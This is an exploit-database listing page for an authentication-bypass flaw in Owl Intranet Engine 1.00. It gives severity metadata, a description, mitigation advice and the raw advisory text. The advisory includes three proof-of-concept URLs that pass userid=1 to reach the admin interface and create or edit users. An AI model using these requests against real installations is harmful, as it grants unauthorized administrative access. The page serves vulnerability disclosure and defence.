header-logo
Suggest Exploit
vendor:
Intranet Engine
by:
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Intranet Engine
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:owl:intranet_engine:1.00
Metasploit:
Other Scripts:
Platforms Tested:

Owl Intranet Engine Authentication Bypass Vulnerability

The Owl Intranet Engine is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to restrict access to the affected application and monitor for any unauthorized access attempts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51076/info

Owl Intranet Engine is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.

Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable. 

http://www.example.org/owl/admin/index.php?userid=1
http://www.example.org/owl/admin/index.php?userid=1&newuser
http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1

Navigation

Suggest Exploit

Services By CQR